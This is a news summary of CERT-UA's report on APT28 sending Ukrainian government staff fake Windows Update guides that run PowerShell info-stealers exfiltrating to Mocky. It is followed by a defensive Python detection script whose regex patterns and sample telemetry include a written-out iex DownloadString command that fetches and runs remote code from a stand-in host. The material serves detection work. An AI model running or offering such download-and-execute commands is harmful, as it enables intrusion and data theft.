"Hackers Use Fake 'Windows Update' Guides to Target Ukrainian Govt"

According to the Computer Emergency Response Team of Ukraine (CERT-UA), Russian hackers are sending malicious emails to various government bodies containing instructions on how to upgrade Windows in order to defend against cyber threats. CERT-UA attributes the emails to the Russian state-sponsored group APT28, also known as Fancy Bear, which impersonated system administrators of the targeted government entities to fool recipients. The attackers created Outlook email addresses using real employee identities obtained by means not yet determined during the attack's preliminary stages. Rather than giving legitimate instructions for upgrading Windows, the emails direct recipients to run a PowerShell command. That command downloads a PowerShell script that imitates a Windows update procedure while simultaneously downloading a second PowerShell payload. The second-stage payload is an information-harvesting tool that runs the 'tasklist' and 'systeminfo' commands to collect data and sends the results in an HTTP request to a Mocky service Application Programming Interface (API). Mocky is a legitimate tool that lets users produce custom HTTP responses, which APT28 used for data exfiltration in this case. System administrators should restrict the ability to launch PowerShell on critical workstations and monitor network traffic for connections to the Mocky service API. This article continues to discuss APT28 using fake Windows Update guides to target various Ukrainian government bodies.
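The monitoring advice above can be turned into a simple correlation rule: flag a PowerShell process that shows a download cradle on its command line, spawns 'tasklist' or 'systeminfo', or opens an HTTP connection to the Mocky service. The following is an added example, not code from CERT-UA or the article; the event schema and sample telemetry are constructed, and MOCKY_HOSTS is an assumption to be replaced with the indicators from the actual report.

```python
"""Detect the fake 'Windows Update' chain described above in endpoint telemetry.

Added example (not from CERT-UA or the article). Events are a constructed,
simplified schema (dicts keyed 'type', 'pid', ...), not a real Sysmon/EDR format.
MOCKY_HOSTS is an assumption: replace it with the indicators from the report.
"""
import re

MOCKY_HOSTS = {"mocky.io"}  # assumption, see module docstring
RECON_TOOLS = {"tasklist", "systeminfo"}  # the two commands the report names
DOWNLOAD_CRADLE = re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)

def is_mocky_host(host):
    """True for the Mocky domain itself or any subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in MOCKY_HOSTS)

def analyze(events):
    """Map each powershell.exe pid to the list of chain indicators it exhibited."""
    powershell_pids, findings = set(), {}
    for ev in events:
        image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
        if ev["type"] == "process" and image == "powershell.exe":
            powershell_pids.add(ev["pid"])
            if DOWNLOAD_CRADLE.search(ev["cmdline"]):
                findings.setdefault(ev["pid"], []).append("download cradle in command line")
        elif ev["type"] == "process" and ev["parent_pid"] in powershell_pids:
            if image.removesuffix(".exe") in RECON_TOOLS:
                findings.setdefault(ev["parent_pid"], []).append(f"spawned {image}")
        elif ev["type"] == "network" and ev["pid"] in powershell_pids:
            if is_mocky_host(ev["dest_host"]):
                findings.setdefault(ev["pid"], []).append(f"HTTP to Mocky host {ev['dest_host']}")
    return findings

def suspicious_pids(events):
    """PIDs showing at least two distinct stages of the chain (download plus recon or exfil)."""
    return sorted(pid for pid, reasons in analyze(events).items() if len(reasons) >= 2)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not captured data
    {"type": "process", "pid": 200, "parent_pid": 100, "image": PS,
     "cmdline": "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://update.invalid/u.ps1')\""},
    {"type": "process", "pid": 201, "parent_pid": 200, "image": r"C:\Windows\System32\tasklist.exe", "cmdline": "tasklist"},
    {"type": "process", "pid": 202, "parent_pid": 200, "image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"},
    {"type": "network", "pid": 200, "dest_host": "run.mocky.io", "dest_port": 443},
    {"type": "process", "pid": 300, "parent_pid": 100, "image": PS, "cmdline": "powershell Get-WindowsUpdateLog"},
    {"type": "network", "pid": 300, "dest_host": "update.example.com", "dest_port": 443},
]
```

Run against SAMPLE_EVENTS, `suspicious_pids` reports only pid 200, since the benign PowerShell session (pid 300) exhibits none of the three indicators.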

Bleeping Computer reports "Hackers Use Fake 'Windows Update' Guides to Target Ukrainian Govt"
